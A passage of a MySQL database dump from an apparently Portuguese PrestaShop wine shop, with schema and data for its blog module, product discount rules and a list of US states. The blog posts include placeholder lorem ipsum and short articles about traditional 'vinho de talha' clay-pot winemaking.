  `last_flush` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smarty_lazy_cache`
--

CREATE TABLE `ps_smarty_lazy_cache` (
  `template_hash` varchar(32) NOT NULL DEFAULT '',
  `cache_id` varchar(255) NOT NULL DEFAULT '',
  `compile_id` varchar(32) NOT NULL DEFAULT '',
  `filepath` varchar(255) NOT NULL DEFAULT '',
  `last_update` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_category`
--

CREATE TABLE `ps_smart_blog_category` (
  `id_smart_blog_category` int(11) NOT NULL,
  `id_parent` varchar(45) DEFAULT NULL,
  `position` varchar(45) DEFAULT NULL,
  `desc_limit` varchar(45) DEFAULT NULL,
  `active` int(11) DEFAULT NULL,
  `created` datetime NOT NULL,
  `modified` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_category`
--

INSERT INTO `ps_smart_blog_category` (`id_smart_blog_category`, `id_parent`, `position`, `desc_limit`, `active`, `created`, `modified`) VALUES
(1, '1', '0', '0', 0, '0000-00-00 00:00:00', '2021-01-25 12:06:00');

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_category_lang`
--

CREATE TABLE `ps_smart_blog_category_lang` (
  `id_smart_blog_category` int(11) NOT NULL,
  `id_lang` int(11) NOT NULL,
  `meta_title` varchar(150) DEFAULT NULL,
  `meta_keyword` varchar(200) DEFAULT NULL,
  `meta_description` varchar(350) DEFAULT NULL,
  `description` varchar(500) DEFAULT NULL,
  `link_rewrite` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_category_lang`
--

INSERT INTO `ps_smart_blog_category_lang` (`id_smart_blog_category`, `id_lang`, `meta_title`, `meta_keyword`, `meta_description`, `description`, `link_rewrite`) VALUES
(1, 1, 'Uncategories', '', '', '', 'uncategories'),
(1, 2, 'Uncategories', '', '', '', 'uncategories');

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_category_shop`
--

CREATE TABLE `ps_smart_blog_category_shop` (
  `id_smart_blog_category_shop` int(11) NOT NULL,
  `id_smart_blog_category` int(11) NOT NULL,
  `id_shop` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_category_shop`
--

INSERT INTO `ps_smart_blog_category_shop` (`id_smart_blog_category_shop`, `id_smart_blog_category`, `id_shop`) VALUES
(1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_comment`
--

CREATE TABLE `ps_smart_blog_comment` (
  `id_smart_blog_comment` int(11) NOT NULL,
  `id_parent` int(11) DEFAULT NULL,
  `id_customer` int(11) DEFAULT NULL,
  `id_post` int(11) DEFAULT NULL,
  `name` varchar(256) DEFAULT NULL,
  `email` varchar(90) DEFAULT NULL,
  `website` varchar(128) DEFAULT NULL,
  `content` text,
  `active` int(11) DEFAULT NULL,
  `created` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_comment_shop`
--

CREATE TABLE `ps_smart_blog_comment_shop` (
  `id_smart_blog_comment_shop` int(11) NOT NULL,
  `id_smart_blog_comment` int(11) NOT NULL,
  `id_shop` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_imagetype`
--

CREATE TABLE `ps_smart_blog_imagetype` (
  `id_smart_blog_imagetype` int(11) NOT NULL,
  `type_name` varchar(45) DEFAULT NULL,
  `width` varchar(45) DEFAULT NULL,
  `height` varchar(45) DEFAULT NULL,
  `type` varchar(45) DEFAULT NULL,
  `active` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_imagetype`
--

INSERT INTO `ps_smart_blog_imagetype` (`id_smart_blog_imagetype`, `type_name`, `width`, `height`, `type`, `active`) VALUES
(1, 'home-default', '370', '240', 'post', 1),
(2, 'home-small', '100', '53', 'post', 1),
(3, 'single-default', '870', '564', 'post', 1),
(4, 'home-small', '100', '23', 'Category', 1),
(5, 'home-default', '350', '80', 'Category', 1),
(6, 'single-default', '870', '200', 'Category', 1),
(7, 'author-default', '54', '54', 'Author', 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_media`
--

CREATE TABLE `ps_smart_blog_media` (
  `id_media` int(11) NOT NULL,
  `id_post` int(11) DEFAULT NULL,
  `id_parent` int(11) DEFAULT NULL,
  `position` int(11) DEFAULT NULL,
  `media_path` varchar(45) DEFAULT NULL,
  `media_name` varchar(45) DEFAULT NULL,
  `media_description` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post`
--

CREATE TABLE `ps_smart_blog_post` (
  `id_smart_blog_post` int(11) NOT NULL,
  `id_author` int(11) DEFAULT NULL,
  `id_category` int(11) DEFAULT NULL,
  `position` int(11) DEFAULT NULL,
  `active` int(11) DEFAULT NULL,
  `available` int(11) DEFAULT NULL,
  `created` datetime NOT NULL,
  `modified` datetime DEFAULT NULL,
  `viewed` int(11) DEFAULT NULL,
  `is_featured` int(11) DEFAULT NULL,
  `comment_status` int(11) DEFAULT NULL,
  `post_type` varchar(45) DEFAULT NULL,
  `image` varchar(245) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_post`
--

INSERT INTO `ps_smart_blog_post` (`id_smart_blog_post`, `id_author`, `id_category`, `position`, `active`, `available`, `created`, `modified`, `viewed`, `is_featured`, `comment_status`, `post_type`, `image`) VALUES
(1, 1, 1, 0, 1, 1, '2020-11-15 17:11:53', '2020-11-17 17:36:09', 2, 0, 1, '0', ''),
(3, 1, 1, 0, 1, 1, '2020-11-15 17:11:53', '2020-11-18 16:43:11', 4, 0, 1, '0', ''),
(4, 1, 1, 0, 1, 1, '2020-11-15 17:11:53', '2020-12-29 11:39:21', 12, 0, 1, '0', ''),
(5, 1, 1, 0, 1, 1, '2020-11-15 17:11:53', '2020-12-19 19:25:44', 27, 0, 1, '0', '');

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post_category`
--

CREATE TABLE `ps_smart_blog_post_category` (
  `id_smart_blog_post_category` int(11) NOT NULL,
  `id_smart_blog_category` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post_lang`
--

CREATE TABLE `ps_smart_blog_post_lang` (
  `id_smart_blog_post` int(11) NOT NULL,
  `id_lang` varchar(45) NOT NULL,
  `meta_title` varchar(150) DEFAULT NULL,
  `meta_keyword` varchar(200) DEFAULT NULL,
  `meta_description` varchar(450) DEFAULT NULL,
  `short_description` varchar(450) DEFAULT NULL,
  `content` text,
  `link_rewrite` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_post_lang`
--

INSERT INTO `ps_smart_blog_post_lang` (`id_smart_blog_post`, `id_lang`, `meta_title`, `meta_keyword`, `meta_description`, `short_description`, `content`, `link_rewrite`) VALUES
(1, '1', 'Lorem ipsum dolor sit amet', '', 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.', 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.', '<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>', 'lorem-ipsum-dolor-sit-amet'),
(1, '2', 'Lorem ipsum dolor sit amet', '', 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.', 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.', '<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>', 'lorem-ipsum-dolor-sit-amet'),
(3, '1', 'Scelerisque vestibulum urna', '', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type an', '<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>', 'scelerisque-vestibulum-urna'),
(3, '2', 'Scelerisque vestibulum urna', '', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.', 'Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type an', '<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>', 'scelerisque-vestibulum-urna'),
(4, '1', 'O processo de produção do vinho de talha', '', '', 'O processo de produção do vinho de talha é um sistema ancestral trazido para a Península Ibérica pelos Romanos. Onde a talha de barro tem uma dupla finalidade, a fermentação e a guarda-estagio-sedimentação do vinho. ', '<p>O processo de produção do vinho de talha é um sistema ancestral trazido para a Península Ibérica pelos Romanos. Onde a talha de barro tem uma dupla finalidade, a fermentação e a guarda-estagio-sedimentação do vinho. O essencial da vinificação em talha pouco mudou em mais de dois mil anos. Em traços gerais, as uvas são colocadas dentro das talhas e a fermentação ocorre espontaneamente.</p>\r\n<p>Diz-se que algures na Geórgia (Cáucaso), aqui há mais ou menos 9 mil anos, alguém se esqueceu de um pote de barro com uvas esmagadas lá dentro, foi ver, provou, gostou era vinho.</p>\r\n<p>Em Portugal, a principal região produtora de vinho de talha é o Alentejo, sendo Vila de Frades considerada a \"capital\" do vinho de talha. </p>\r\n<p>O vinho de talha encontra-se regulamentado na CVRA, como vinho DOP Alentejo, e as normas exigem e a fiscalização comprova no local que o vinho de talha, para ser considerado como tal, só pode ser separado das massas no dia 11 de Novembro, ou depois. Nós ACV, em geral só separamos o líquidos massas nos finais de Dezembro.</p>\r\n<p>Promovida pela Câmara Municipal da Vidigueira e com o envolvimento de 27 instituições, entre municípios do Alentejo e outras entidades, está a ser preparada, neste momento, a candidatura da produção do vinho de talha a Património Cultural Imaterial da UNESCO. No âmbito da candidatura e como o objetivo de promover e va</p>', ''),
(4, '2', 'The winemaking process is a Roman ancestral winemaking system', '', '', 'The winemaking process is a Roman ancestral winemaking system, where clay carving serves a dual purpose, the production and storage of wine. That is, the wine is made and stored in the same container.', '<p class=\"MsoNormal\" style=\"text-align: justify;\">The winemaking process is a Roman ancestral winemaking system, where clay carving serves a dual purpose, the production and storage of wine. That is, the wine is made and stored in the same container. The essence of carving vinification has changed little in over two thousand years. Generally speaking, the grapes are placed inside the carvings and fermentation occurs spontaneously.</p>\r\n<p class=\"MsoNormal\">It is said that somewhere in Georgia (Caucasus), here about 9,000 years ago, someone forgot a crock of crushed grapes in there, went to see, tasted, liked it was wine.</p>\r\n<p class=\"MsoNormal\">In Portugal, the main wine producing region is the Alentejo, being Vila de Frades considered the \"capital\" of the wine.</p>\r\n<p class=\"MsoNormal\">Carving wine is regulated by CVRA as PDO Alentejo wine, and the standards require and supervision proves on the spot that carving wine, to be considered as such, can only be separated from the masses on 11 November, or later. We LCAs generally only separated the liquid masses at the end of December.</p>\r\n<p class=\"MsoNormal\">Promoted by the Municipality of Vidigueira and with the involvement of 27 institutions, including municipalities of the Alentejo and other entities, is currently preparing the application of the production of the wine of intangible heritage to UNESCO Intangible Cultural Heritage. Within the scope of the application and as the objective of promoting and valuing this product the Interpretive Center of Talha Wine of Vila de Frades will open soon.</p>\r\n<p></p>', ''),
(5, '1', 'Iniciação Ao Vinho De Talha Até 5 Pessoas', '', 'Ei has mutat solum. Fugit atomorum efficiantur an vim, te mea diceret democritum referrentur, et altera aliquid mea. Sed illud dictas placerat ex, vel ea nihil recusabo consectetuer. Est et utamur similique, pro repudiare gubergren in.', 'Ei has mutat solum. Fugit atomorum efficiantur an vim, te mea diceret democritum referrentur, et altera aliquid mea. Sed illud dictas placerat ex, vel ea nihil recusabo consectetuer. Est et utamur sim', '<p>Contamos consigo para desvendar os segredos de produção dos nossos Vinhos de Talha numa visita às nossas vinhas e testar os seus sentidos com uma prova comentada de 4 vinhos de talha e comprovar que não só se pode engarrafar sem perder as suas características, como na garrafa evolui de forma muito interessante.</p>\r\n<p>Preço da experiência válido para 5 pessoas.</p>', ''),
(5, '2', 'Viderer voluptatum te eum', '', 'Ei has mutat solum. Fugit atomorum efficiantur an vim, te mea diceret democritum referrentur, et altera aliquid mea. Sed illud dictas placerat ex, vel ea nihil recusabo consectetuer. Est et utamur similique, pro repudiare gubergren in.', 'Ei has mutat solum. Fugit atomorum efficiantur an vim, te mea diceret democritum referrentur, et altera aliquid mea. Sed illud dictas placerat ex, vel ea nihil recusabo consectetuer. Est et utamur sim', '<p>Ei has mutat solum. Fugit atomorum efficiantur an vim, te mea diceret democritum referrentur, et altera aliquid mea. Sed illud dictas placerat ex, vel ea nihil recusabo consectetuer. Est et utamur similique, pro repudiare gubergren in.</p>', 'viderer-voluptatum-te-eum');

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post_related`
--

CREATE TABLE `ps_smart_blog_post_related` (
  `id_post` int(11) NOT NULL,
  `related_post_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post_shop`
--

CREATE TABLE `ps_smart_blog_post_shop` (
  `id_smart_blog_post_shop` int(11) NOT NULL,
  `id_smart_blog_post` int(11) NOT NULL,
  `id_shop` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_smart_blog_post_shop`
--

INSERT INTO `ps_smart_blog_post_shop` (`id_smart_blog_post_shop`, `id_smart_blog_post`, `id_shop`) VALUES
(1, 1, 1),
(3, 3, 1),
(4, 4, 1),
(5, 5, 1);

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_post_tag`
--

CREATE TABLE `ps_smart_blog_post_tag` (
  `id_tag` int(11) NOT NULL,
  `id_post` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_product_related`
--

CREATE TABLE `ps_smart_blog_product_related` (
  `id_post` int(11) NOT NULL,
  `id_product` int(11) DEFAULT NULL,
  `position` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_smart_blog_tag`
--

CREATE TABLE `ps_smart_blog_tag` (
  `id_tag` int(11) NOT NULL,
  `id_lang` int(11) DEFAULT NULL,
  `name` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_specific_price`
--

CREATE TABLE `ps_specific_price` (
  `id_specific_price` int(10) UNSIGNED NOT NULL,
  `id_specific_price_rule` int(11) UNSIGNED NOT NULL,
  `id_cart` int(11) UNSIGNED NOT NULL,
  `id_product` int(10) UNSIGNED NOT NULL,
  `id_shop` int(11) UNSIGNED NOT NULL DEFAULT '1',
  `id_shop_group` int(11) UNSIGNED NOT NULL,
  `id_currency` int(10) UNSIGNED NOT NULL,
  `id_country` int(10) UNSIGNED NOT NULL,
  `id_group` int(10) UNSIGNED NOT NULL,
  `id_customer` int(10) UNSIGNED NOT NULL,
  `id_product_attribute` int(10) UNSIGNED NOT NULL,
  `price` decimal(20,6) NOT NULL,
  `from_quantity` mediumint(8) UNSIGNED NOT NULL,
  `reduction` decimal(20,6) NOT NULL,
  `reduction_tax` tinyint(1) NOT NULL DEFAULT '1',
  `reduction_type` enum('amount','percentage') NOT NULL,
  `from` datetime NOT NULL,
  `to` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_specific_price`
--

INSERT INTO `ps_specific_price` (`id_specific_price`, `id_specific_price_rule`, `id_cart`, `id_product`, `id_shop`, `id_shop_group`, `id_currency`, `id_country`, `id_group`, `id_customer`, `id_product_attribute`, `price`, `from_quantity`, `reduction`, `reduction_tax`, `reduction_type`, `from`, `to`) VALUES
(3, 0, 0, 41, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(4, 0, 0, 42, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(5, 0, 0, 44, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(6, 0, 0, 43, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(7, 0, 0, 45, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(8, 0, 0, 46, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(9, 0, 0, 24, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(10, 0, 0, 22, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(11, 0, 0, 23, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(12, 0, 0, 25, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(13, 0, 0, 36, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(17, 0, 0, 26, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(18, 0, 0, 27, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(19, 0, 0, 56, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(20, 0, 0, 57, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(21, 0, 0, 59, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(22, 0, 0, 60, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(23, 0, 0, 61, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(24, 0, 0, 62, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(25, 0, 0, 63, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(26, 0, 0, 64, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(28, 0, 0, 67, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '2021-02-01 00:00:00', '2021-12-31 00:00:00'),
(30, 0, 0, 69, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(31, 0, 0, 73, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(32, 0, 0, 74, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(34, 0, 0, 76, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(35, 0, 0, 77, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(36, 0, 0, 78, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(37, 0, 0, 79, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00'),
(38, 0, 0, 80, 1, 0, 0, 0, 5, 0, 0, -1.000000, 1, 0.100000, 1, 'percentage', '0000-00-00 00:00:00', '0000-00-00 00:00:00');

-- --------------------------------------------------------

--
-- Table structure for table `ps_specific_price_priority`
--

CREATE TABLE `ps_specific_price_priority` (
  `id_specific_price_priority` int(11) NOT NULL,
  `id_product` int(11) NOT NULL,
  `priority` varchar(80) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_specific_price_priority`
--

INSERT INTO `ps_specific_price_priority` (`id_specific_price_priority`, `id_product`, `priority`) VALUES
(1, 39, 'id_shop;id_currency;id_country;id_group'),
(2, 38, 'id_shop;id_currency;id_country;id_group'),
(6, 57, 'id_shop;id_currency;id_country;id_group'),
(7, 56, 'id_shop;id_currency;id_country;id_group'),
(8, 63, 'id_shop;id_currency;id_country;id_group'),
(9, 59, 'id_shop;id_currency;id_country;id_group'),
(10, 60, 'id_shop;id_currency;id_country;id_group'),
(15, 49, 'id_shop;id_currency;id_country;id_group'),
(17, 50, 'id_shop;id_currency;id_country;id_group'),
(19, 62, 'id_shop;id_currency;id_country;id_group'),
(20, 64, 'id_shop;id_currency;id_country;id_group'),
(21, 61, 'id_shop;id_currency;id_country;id_group'),
(22, 26, 'id_shop;id_currency;id_country;id_group'),
(24, 67, 'id_shop;id_currency;id_country;id_group'),
(37, 68, 'id_shop;id_currency;id_country;id_group'),
(79, 24, 'id_shop;id_currency;id_country;id_group'),
(80, 25, 'id_shop;id_currency;id_country;id_group'),
(82, 27, 'id_shop;id_currency;id_country;id_group'),
(83, 41, 'id_shop;id_currency;id_country;id_group'),
(84, 43, 'id_shop;id_currency;id_country;id_group'),
(85, 45, 'id_shop;id_currency;id_country;id_group'),
(86, 46, 'id_shop;id_currency;id_country;id_group'),
(95, 69, 'id_shop;id_currency;id_country;id_group'),
(96, 36, 'id_shop;id_currency;id_country;id_group'),
(97, 22, 'id_shop;id_currency;id_country;id_group'),
(99, 23, 'id_shop;id_currency;id_country;id_group'),
(108, 54, 'id_shop;id_currency;id_country;id_group'),
(123, 42, 'id_shop;id_currency;id_country;id_group'),
(128, 44, 'id_shop;id_currency;id_country;id_group'),
(132, 70, 'id_shop;id_currency;id_country;id_group'),
(169, 71, 'id_shop;id_currency;id_country;id_group'),
(174, 72, 'id_shop;id_currency;id_country;id_group'),
(180, 73, 'id_shop;id_currency;id_country;id_group'),
(189, 74, 'id_shop;id_currency;id_country;id_group'),
(191, 76, 'id_shop;id_currency;id_country;id_group'),
(197, 77, 'id_shop;id_currency;id_country;id_group'),
(203, 78, 'id_shop;id_currency;id_country;id_group'),
(205, 79, 'id_shop;id_currency;id_country;id_group'),
(208, 80, 'id_shop;id_currency;id_country;id_group'),
(212, 81, 'id_shop;id_currency;id_country;id_group');

-- --------------------------------------------------------

--
-- Table structure for table `ps_specific_price_rule`
--

CREATE TABLE `ps_specific_price_rule` (
  `id_specific_price_rule` int(10) UNSIGNED NOT NULL,
  `name` varchar(255) NOT NULL,
  `id_shop` int(11) UNSIGNED NOT NULL DEFAULT '1',
  `id_currency` int(10) UNSIGNED NOT NULL,
  `id_country` int(10) UNSIGNED NOT NULL,
  `id_group` int(10) UNSIGNED NOT NULL,
  `from_quantity` mediumint(8) UNSIGNED NOT NULL,
  `price` decimal(20,6) DEFAULT NULL,
  `reduction` decimal(20,6) NOT NULL,
  `reduction_tax` tinyint(1) NOT NULL DEFAULT '1',
  `reduction_type` enum('amount','percentage') NOT NULL,
  `from` datetime NOT NULL,
  `to` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_specific_price_rule_condition`
--

CREATE TABLE `ps_specific_price_rule_condition` (
  `id_specific_price_rule_condition` int(11) UNSIGNED NOT NULL,
  `id_specific_price_rule_condition_group` int(11) UNSIGNED NOT NULL,
  `type` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_specific_price_rule_condition_group`
--

CREATE TABLE `ps_specific_price_rule_condition_group` (
  `id_specific_price_rule_condition_group` int(11) UNSIGNED NOT NULL,
  `id_specific_price_rule` int(11) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_state`
--

CREATE TABLE `ps_state` (
  `id_state` int(10) UNSIGNED NOT NULL,
  `id_country` int(11) UNSIGNED NOT NULL,
  `id_zone` int(11) UNSIGNED NOT NULL,
  `name` varchar(64) NOT NULL,
  `iso_code` varchar(7) NOT NULL,
  `tax_behavior` smallint(1) NOT NULL DEFAULT '0',
  `active` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_state`
--

INSERT INTO `ps_state` (`id_state`, `id_country`, `id_zone`, `name`, `iso_code`, `tax_behavior`, `active`) VALUES
(1, 21, 2, 'AA', 'AA', 0, 1),
(2, 21, 2, 'AE', 'AE', 0, 1),
(3, 21, 2, 'AP', 'AP', 0, 1),
(4, 21, 2, 'Alabama', 'AL', 0, 1),
(5, 21, 2, 'Alaska', 'AK', 0, 1),
(6, 21, 2, 'Arizona', 'AZ', 0, 1),
(7, 21, 2, 'Arkansas', 'AR', 0, 1),
(8, 21, 2, 'California', 'CA', 0, 1),
(9, 21, 2, 'Colorado', 'CO', 0, 1),
(10, 21, 2, 'Connecticut', 'CT', 0, 1),
(11, 21, 2, 'Delaware', 'DE', 0, 1),
(12, 21, 2, 'Florida', 'FL', 0, 1),
(13, 21, 2, 'Georgia', 'GA', 0, 1),
(14, 21, 2, 'Hawaii', 'HI', 0, 1),
(15, 21, 2, 'Idaho', 'ID', 0, 1),
(16, 21, 2, 'Illinois', 'IL', 0, 1),
(17, 21, 2, 'Indiana', 'IN', 0, 1),
(18, 21, 2, 'Iowa', 'IA', 0, 1),
(19, 21, 2, 'Kansas', 'KS', 0, 1),
(20, 21, 2, 'Kentucky', 'KY', 0, 1),
(21, 21, 2, 'Louisiana', 'LA', 0, 1),
(22, 21, 2, 'Maine', 'ME', 0, 1),
(23, 21, 2, 'Maryland', 'MD', 0, 1),
(24, 21, 2, 'Massachusetts', 'MA', 0, 1),
(25, 21, 2, 'Michigan', 'MI', 0, 1),
(26, 21, 2, 'Minnesota', 'MN', 0, 1),
(27, 21, 2, 'Mississippi', 'MS', 0, 1),
(28, 21, 2, 'Missouri', 'MO', 0, 1),
(29, 21, 2, 'Montana', 'MT', 0, 1),
(30, 21, 2, 'Nebraska', 'NE', 0, 1),
(31, 21, 2, 'Nevada', 'NV', 0, 1),
(32, 21, 2, 'New Hampshire', 'NH', 0, 1),
(33, 21, 2, 'New Jersey', 'NJ', 0, 1),
(34, 21, 2, 'New Mexico', 'NM', 0, 1),
(35, 21, 2, 'New York', 'NY', 0, 1),
(36, 21, 2, 'North Carolina', 'NC', 0, 1),
(37, 21, 2, 'North Dakota', 'ND', 0, 1),
(38, 21, 2, 'Ohio', 'OH', 0, 1),
(39, 21, 2, 'Oklahoma', 'OK', 0, 1),
(40, 21, 2, 'Oregon', 'OR', 0, 1),
